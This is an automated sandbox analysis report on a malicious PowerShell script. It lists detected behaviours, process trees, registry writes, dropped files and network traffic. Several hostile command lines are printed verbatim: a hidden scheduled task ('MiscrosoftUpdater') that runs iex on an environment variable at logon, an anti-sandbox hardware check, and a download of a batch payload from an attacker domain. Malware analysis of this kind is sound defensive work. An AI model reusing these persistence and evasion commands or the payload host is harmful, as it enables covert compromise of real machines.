File name:

dab.ps1

Full analysis: https://app.any.run/tasks/e29b9127-2cae-4aa5-8a0b-98eb552aebe4
Verdict: Malicious activity
Analysis date: March 15, 2026, 10:47:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
powershell
anti-evasion
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (1301), with no line terminators
MD5:

570E004DE3AB1919AC48BE8B1046FA54

SHA1:

E75483B46FCB0365AA0215CE213E19C23930BCBF

SHA256:

8FA1E52FF3884C766690D6931817E525047F41FBC750AC1E26D19E76DE595D4E

SSDEEP:

3:uKNaafYyK/TBKdn:FQT0n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Get Video Controller Information (POWERSHELL)

      • cmd.exe (PID: 8712)
      • powershell.exe (PID: 6924)
      • powershell.exe (PID: 5628)
      • cmd.exe (PID: 3020)
      • powershell.exe (PID: 4336)
      • powershell.exe (PID: 7668)
    • Enumerates physical memory (Win32_PhysicalMemory) (SCRIPT)

      • powershell.exe (PID: 6924)
      • powershell.exe (PID: 4336)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
    • Enumerates Video Controller (GPU Information Query) (SCRIPT)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Known privilege escalation attack

      • dllhost.exe (PID: 7624)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 8340)
    • Checks whether a specified folder exists (SCRIPT)

      • wscript.exe (PID: 8340)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 8340)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 8340)
    • UAC Bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 5628)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2796)
      • powershell.exe (PID: 4924)
  • SUSPICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7992)
      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • The process executes Powershell scripts

      • powershell.exe (PID: 7992)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
      • powershell.exe (PID: 7668)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
      • powershell.exe (PID: 7668)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 7992)
      • wscript.exe (PID: 1784)
    • The process hides Powershell's copyright startup banner

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 8712)
      • cmd.exe (PID: 3020)
    • Converts TXT file into a string

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Queries Computer System Information (Win32_ComputerSystem) (SCRIPT)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Used cmstp for execute code hidden within an inf file

      • powershell.exe (PID: 5628)
    • Runs WScript without displaying logo

      • wscript.exe (PID: 8340)
    • The process executes VB scripts

      • wscript.exe (PID: 8340)
      • wscript.exe (PID: 1784)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 5628)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 8340)
    • Application launched itself

      • wscript.exe (PID: 8340)
      • powershell.exe (PID: 7668)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8340)
      • wscript.exe (PID: 1784)
    • Uses TASKKILL.EXE to kill process

      • wscript.exe (PID: 8340)
      • dllhost.exe (PID: 7624)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 8340)
    • Deletes a service using sc.exe

      • sc.exe (PID: 8916)
    • Starts SC.EXE for service management

      • powershell.exe (PID: 5628)
    • Windows service management via SC.EXE

      • sc.exe (PID: 8916)
    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 5628)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 2796)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 7992)
      • cmstp.exe (PID: 7020)
      • cmstp.exe (PID: 7236)
      • powershell.exe (PID: 7668)
    • Create files in a temporary directory

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 7020)
      • cmstp.exe (PID: 7236)
    • Creates files in the program directory

      • dllhost.exe (PID: 7624)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5628)
      • powershell.exe (PID: 7668)
    • Creates files or folders in the user directory

      • powershell.exe (PID: 5628)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
170
Monitored processes
27
Malicious processes
10
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
684C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1784"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\runab.vbs" C:\Windows\System32\wscript.exe—wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2284"C:\Windows\System32\taskkill.exe" /f /im cmstp.exeC:\Windows\System32\taskkill.exe—wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2620\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2796"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command " $Action = New-ScheduledTaskAction -Execute 'conhost.exe' -Argument '--headless " powershell -NoProfile -WindowStyle Hidden -c \"iex([System.Environment]::GetEnvironmentVariable(''KOXP''))\""'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0; Register-ScheduledTask -TaskName 'MiscrosoftUpdater' -Action $Action -Trigger $Trigger -Settings $Settings -RunLevel Highest -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3020C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\WD.bat" "C:\Windows\System32\cmd.exe—wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3584taskkill /IM cmstp.exe /FC:\Windows\System32\taskkill.exe—dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
128
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4336powershell -NoLogo -NoProfile -Command "if((Get-CimInstance Win32_VideoController | Where-Object {$_.Name -like '*Microsoft Remote Display Adapter*'}) -or ([math]::Round((Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory/1GB) -lt 3)){exit 1}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4352\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4364\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—sc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
89 349
Read events
89 336
Write events
13
Delete events
0

Modification events

(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7020) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(8340) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(7020) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(7624) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
Executable files
0
Suspicious files
5
Text files
23
Unknown types
0

Dropped files

PID
Process
Filename
Type
7992powershell.exeC:\Users\admin\AppData\Local\Temp\WD.bat —
MD5:—
SHA256:—
7992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e5ef6.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
6924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_flptfjzk.bdb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:D869DB392774186C5379D9F34A6AF31F
SHA256:8F9E6E1C4E0D450AF24EFA9D9D78DF8B56E0F3EA4715F16C724A799B1C6CB761
7992powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2yjut0an.0er.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NINA5E1WCMJRGX1JNQ1T.tempbinary
MD5:D869DB392774186C5379D9F34A6AF31F
SHA256:8F9E6E1C4E0D450AF24EFA9D9D78DF8B56E0F3EA4715F16C724A799B1C6CB761
7992powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_acyodoni.4hw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7992powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:B01D4BC09B6EF2732439AE5BE07F411B
SHA256:D9F4E3E4D4F5E910D1518E22B3275FB741C495C5C5DC9867D68B51E07296DEAD
6924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ot1zepzw.klv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5628powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1uficxe2.dkn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
29
DNS requests
12
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
8888
RUXIMICS.exe
GET
304
51.104.136.2:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/RUXIM?os=Windows&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3623&OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&FlightRing=Retail&AttrDataVer=186&App=RUXIM&AppVer=&DeviceFamily=Windows.Desktop
US
—
—
whitelisted
6768
MoUsoCoreWorker.exe
GET
304
51.104.136.2:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
—
—
whitelisted
8888
RUXIMICS.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
7992
powershell.exe
GET
200
104.21.81.165:443
https://mountaingoats4sale.xyz/WDS.bat
US
text
5.00 Mb
unknown
—
—
GET
200
104.21.81.165:443
https://mountaingoats4sale.xyz/WDS.bat
US
text
10.7 Mb
unknown
—
—
POST
500
48.192.1.65:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
text
512 b
whitelisted
3292
svchost.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl
US
binary
814 b
whitelisted
3292
svchost.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
US
binary
813 b
whitelisted
3292
svchost.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
US
binary
401 b
whitelisted
3292
svchost.exe
GET
200
2.16.164.72:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
NL
binary
824 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6200
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
—
Not routed
—
whitelisted
8888
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
—
Not routed
—
whitelisted
8888
RUXIMICS.exe
23.216.77.6:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6200
svchost.exe
23.216.77.6:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6768
MoUsoCoreWorker.exe
23.216.77.6:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
8888
RUXIMICS.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
6200
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
self.events.data.microsoft.com
  • 13.69.116.104
  • 51.132.193.104
whitelisted
google.com
  • 142.250.203.206
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.36
  • 23.216.77.42
  • 23.216.77.25
  • 2.16.164.72
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 23.59.18.102
whitelisted
mountaingoats4sale.xyz
  • 104.21.81.165
  • 172.67.145.8
unknown
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
fingercakes4sale.store
  • 173.232.146.211
unknown

Threats

PID
Process
Class
Message
6200
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
—
—
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
—
—
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-CimInstance Cmdlet has been detected
—
—
Potentially Bad Traffic
ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
7992
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7992
powershell.exe
Potentially Bad Traffic
ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
7992
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-CimInstance Cmdlet has been detected
No debug info